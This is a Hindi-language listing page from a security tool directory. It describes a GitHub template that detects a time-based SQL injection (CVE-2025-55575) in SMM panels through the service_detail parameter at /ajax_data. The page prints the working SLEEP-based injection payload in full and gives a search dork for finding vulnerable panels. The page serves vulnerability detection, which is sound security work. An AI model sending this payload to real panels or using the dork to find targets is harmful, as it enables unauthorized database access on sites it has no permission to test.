Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55575 — SMM पैनल के लिए समय-आधारित SQL इंजेक्शन डिटेक्शन टेम्पलेट, जो /ajax_data पर तैयार POST अनुरोधों के माध्यम से service_detail पैरामीटर को लक्षित करता है, भेद्यता की पुष्टि के लिए प्रतिक्रिया विलंब का उपयोग करता है। | Kitploit
उपकरण/GitHubGitHub/aether-0/cve-2025-55575
भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubaether-0/cve-2025-55575

CVE-2025-55575

SMM पैनल के लिए समय-आधारित SQL इंजेक्शन डिटेक्शन टेम्पलेट, जो /ajax_data पर तैयार POST अनुरोधों के माध्यम से service_detail पैरामीटर को लक्षित करता है, भेद्यता की पुष्टि के लिए प्रतिक्रिया विलंब का उपयोग करता है।

रिपॉजिटरी देखें
33411 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

smm-panel-sqli(CVE-2025-55575)

SMM पैनल के लिए समय-आधारित SQL इंजेक्शन पहचान


अवलोकन

यह टेम्पलेट, /ajax_data पर HTTP POST अनुरोधों के माध्यम से SMM पैनल के service_detail पैरामीटर में समय-आधारित SQL इंजेक्शन कमज़ोरी का पता लगाता है। इसका दुरुपयोग करके रिमोट हमलावर संवेदनशील डेटा तक पहुँच प्राप्त कर सकते हैं या विशेषाधिकार बढ़ा सकते हैं।

  • लेखक: Aether
  • गंभीरता: गंभीर
  • टैग: sqli, mysql, timing, dork:'intitle:"#1 SMM Panel ****"' "smm panel"
  • संदर्भ: https://owasp.org/www-community/attacks/SQL_Injection

पहचान तर्क

उपकरण एक तैयार POST अनुरोध भेजता है:

root@kitploit:~
POST /ajax_data
Content-Type: application/x-www-form-urlencoded

action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z

यदि प्रतिक्रिया समय 5 सेकंड से अधिक है, तो यह एक संवेदनशील एंडपॉइंट को इंगित करता है।

पहचान उदाहरण

root@kitploit:~
- Method: POST
- Path: {{BaseURL}}/ajax_data
- Headers: Content-Type: application/x-www-form-urlencoded
- Body: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: duration > 5 seconds

वीडियो डेमो

SQLi PoC


टूल डाउनलोड करें